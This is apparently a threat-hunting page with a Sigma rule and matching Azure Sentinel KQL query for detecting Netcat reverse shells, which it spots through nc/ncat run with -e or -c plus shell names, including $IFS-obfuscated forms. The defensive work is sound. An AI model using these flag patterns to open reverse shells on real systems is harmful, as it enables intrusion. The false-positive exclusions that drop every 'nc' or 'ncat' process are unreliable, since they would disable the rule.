The hypothesis is that the detection identifies potential adversary use of Netcat to establish a reverse shell, leveraging T1059 to maintain command and control. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate early-stage persistent access attempts by advanced threats.
Detection Rule
title: Potential Netcat Reverse Shell Execution
id: 7f734ed0-4f47-46c0-837f-6ee62505abd9
status: test
description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
- https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
- https://www.infosecademy.com/netcat-reverse-shells/
- https://man7.org/linux/man-pages/man1/ncat.1.html
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-07
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection_nc:
Image|endswith:
- '/nc'
- '/ncat'
selection_flags:
CommandLine|contains:
- ' -c '
- ' -e '
selection_shell:
CommandLine|contains:
- ' ash'
- ' bash'
- ' bsh'
- ' csh'
- ' ksh'
- ' pdksh'
- ' sh'
- ' tcsh'
- '/bin/ash'
- '/bin/bash'
- '/bin/bsh'
- '/bin/csh'
- '/bin/ksh'
- '/bin/pdksh'
- '/bin/sh'
- '/bin/tcsh'
- '/bin/zsh'
- '$IFSash'
- '$IFSbash'
- '$IFSbsh'
- '$IFScsh'
- '$IFSksh'
- '$IFSpdksh'
- '$IFSsh'
- '$IFStcsh'
- '$IFSzsh'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
imProcessCreate
| where (TargetProcessName endswith "/nc" or TargetProcessName endswith "/ncat") and (TargetProcessCommandLine contains " -c " or TargetProcessCommandLine contains " -e ") and (TargetProcessCommandLine contains " ash" or TargetProcessCommandLine contains " bash" or TargetProcessCommandLine contains " bsh" or TargetProcessCommandLine contains " csh" or TargetProcessCommandLine contains " ksh" or TargetProcessCommandLine contains " pdksh" or TargetProcessCommandLine contains " sh" or TargetProcessCommandLine contains " tcsh" or TargetProcessCommandLine contains "/bin/ash" or TargetProcessCommandLine contains "/bin/bash" or TargetProcessCommandLine contains "/bin/bsh" or TargetProcessCommandLine contains "/bin/csh" or TargetProcessCommandLine contains "/bin/ksh" or TargetProcessCommandLine contains "/bin/pdksh" or TargetProcessCommandLine contains "/bin/sh" or TargetProcessCommandLine contains "/bin/tcsh" or TargetProcessCommandLine contains "/bin/zsh" or TargetProcessCommandLine contains "$IFSash" or TargetProcessCommandLine contains "$IFSbash" or TargetProcessCommandLine contains "$IFSbsh" or TargetProcessCommandLine contains "$IFScsh" or TargetProcessCommandLine contains "$IFSksh" or TargetProcessCommandLine contains "$IFSpdksh" or TargetProcessCommandLine contains "$IFSsh" or TargetProcessCommandLine contains "$IFStcsh" or TargetProcessCommandLine contains "$IFSzsh")Scenario: Scheduled System Maintenance Task Using Netcat
Description: A legitimate scheduled task uses netcat to check connectivity to a monitoring server.
Filter/Exclusion: process.parent_process_name:"Task Scheduler" or process.command_line:"-z"
Scenario: Network Diagnostic Tool Using Netcat
Description: A network administrator uses nc (netcat) to test port connectivity or perform DNS lookups.
Filter/Exclusion: process.name:"nc" or process.command_line:"-zv"
Scenario: Log Collection via Netcat
Description: A log aggregation tool uses netcat to send logs to a central server.
Filter/Exclusion: process.command_line:"-u <central_server_ip>" or process.name:"ncat"
Scenario: Admin Task to Establish Reverse SSH Tunnel
Description: An admin uses netcat to establish a reverse SSH tunnel for remote access.
Filter/Exclusion: process.command_line:"-z <remote_ip>" or process.parent_process_name:"ssh"
Scenario: Automated Backup Tool Using Netcat for Data Transfer
Description: A backup tool uses netcat to transfer data over a secure internal network.
Filter/Exclusion: process.command_line:"-u <backup_server_ip>" or process.parent_process_name:"backup_service"